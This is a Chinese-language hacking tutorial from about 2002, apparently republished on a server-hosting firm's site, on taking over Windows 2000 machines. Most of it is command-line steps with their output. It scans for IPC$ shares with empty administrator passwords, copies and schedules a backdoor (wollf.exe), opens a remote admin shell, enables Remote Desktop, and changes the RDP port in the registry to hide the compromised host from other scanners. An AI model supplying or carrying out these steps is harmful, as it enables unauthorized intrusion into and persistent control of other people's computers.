|
怎樣從ipc$到開放3389到最后3389只為你服務����!
工具:流光4.7 (http://www.heibai.net/download/show.php?id=2277&down=1)
Wollf v1.6 (http://www.heibai.net/download/show.php?id=2996&down=1)
HBULOT (http://www.heibai.net/download/show.php?id=2951&down=1)
本機平臺:2000/NT
目標平臺:2000/NT
以上工具在黑白均能找到,具體使用方法會在文章中會介紹�。
首先打開流光(如果你連流光都沒聽過過的話,我想你沒必要看這篇文章),Ctrl+A����,填上一段ip,選擇IPC掃
描��。過一會有結果了:
218.22.155.* (SERVER)
--------------------------------------------------------------------------------
IPC掃描
獲得共享列表
g f e h I
獲得用戶列表
029 1 2 Administrator (Admin) Guest IUSR_SERVER IWAM_SERVER TsInternetUser
猜解成功用戶帳號 Administrator (Admin):(NULL)
隨便找了一臺做實驗�,先ipc$連上再說。
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us
er:administrator----------------連接成功��!
命令成功完成���。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi
n$------------------------------拷貝wollf.exe到目標計算機的admin$目錄
已復制 1 個文件。
C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm
in$-----------------------------拷貝hbulot.exe到目標計算機的admin$目錄
已復制 1 個文件�。
C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.*
\\218.22.155.* 的當前時間是 2002/12/1 上午 06:37
命令成功完成。
C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe
新加了一項作業(yè)�����,其作業(yè) ID = 1--指定wollf.exe在06:39運行
------------------------------------------------------------------------------------------
說明:
wollf.exe是一個后門程序���,很多高手都喜歡nc或者winshell�,不過我對他情有獨鐘�����!在這里我只介紹與本文內
容有關的命令參數(shù),它的高級用法不做補充��。
hbulot.exe是用于開啟3389服務�,如果不是server及以上版本,就不要運行了��。因為pro版不能安裝終端服務�����。
2分鐘后......
==========================================================================================
C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614
"Wollf Remote Manager" v1.6
Code by wollf, http://www.xfocus.org
------------------------------------------------------------------------------------------
說明:
使用wollf連接時要注意wollf.exe要在當前目錄����,它的連接命令格式:wollf -connect IP 7614
7614是wollf開放的端口。如果顯示如上����,說明你已經連接成功,并具有管理員administrator權限����。
==========================================================================================
[server@D:\WINNT\system32]#dos
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版權所有 1985-2000 Microsoft Corp.
------------------------------------------------------------------------------------------
說明:
輸入dos,你就會進入目標機的cmd下,這時同樣具有administrator權限�。
==========================================================================================
D:\WINNT\system32>cd..
cd..
D:\WINNT>dir h*.*
dir h*.*
驅動器 D 中的卷沒有標簽。
卷的序列號是 1CE5-2615
D:\WINNT 的目錄
2002-11-27 03:07 <DIR> Help
2002-09-10 12:16 10,752 hh.exe
2002-10-01 08:29 24,576 HBULOT.exe
2 個文件 35,328 字節(jié)
1 個目錄 9,049,604,096 可用字節(jié)
D:\WINNT>hbulot
hbulot
------------------------------------------------------------------------------------------
說明:
因為我們把HBULOT.exe放到目標機的admin$下的,所以先找到它����,以上是文件的存放位置。
==========================================================================================
D:\WINNT>exit
exit
Command "DOS" succeed.
[server@D:\WINNT\system32]#reboot
Command "REBOOT" succeed.
[server@D:\WINNT\system32]#
Connection closed.
------------------------------------------------------------------------------------------
說明:
由dos退到wollf的連接模式下用exit命令���,HBULOT.exe運行后需重新啟動方可生效����,這里wollf自帶的REBOOT
命令��,執(zhí)行過在5秒后你就會失去連接��。啟動完畢后檢查一下3389端口是否開放�����,方法很多���,superscan3掃一下
。這時候你就可以登陸了���。如果沒有開放3389那就不是server及以上版本�,就不要運行了。因為pro版不能安裝
終端服務����。
到這里,你已經擁有3389肉雞了��!但是會不會被別的入侵者發(fā)現(xiàn)呢����?下面所教的就是怎么讓3389只為你服務!
我們現(xiàn)在使用的3389登陸器有兩種版本�����,一種是2000/98�,一種是XP。二者區(qū)別呢���?前者使用的默認端口3389對
目標���,后者默認的也是3389端口,但是它還支持別的端口進行連接����!所以呢......我們來修改3389的連接端口
來躲過普通掃描器的掃描����!修改方法如下:
修改服務器端的端口設置 ����,注冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值��,默認是3389�����,修改成所希望的端口�,比如1314
第二個地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默認是3389��,修改成所希望的端口��,比如1314
現(xiàn)在這樣就可以了��。重啟系統(tǒng)吧���。
注意:事實上,只修改第二處也是可以的�。另外����,第二處的標準聯(lián)結應該是
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\<connection>
<connection>表示具體的某個RDP-TCP連結��。
重啟過后�����,看看端口有沒有改����。
小技巧:修改注冊表鍵值時,先選擇10進制����,輸入你希望的端口數(shù)值,再選擇16進制�����,系統(tǒng)會自動轉換�����。
億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
聯(lián)系:億恩小凡
QQ:89317007
電話:0371-63322206
本文出自:億恩科技【mszdt.com】
服務器租用/服務器托管中國五強���!虛擬主機域名注冊頂級提供商!15年品質保障�����!--億恩科技[ENKJ.COM]
|
香港服務器租用
美國服務器租用
電信骨干機房
聯(lián)通骨干機房
0371-60135900
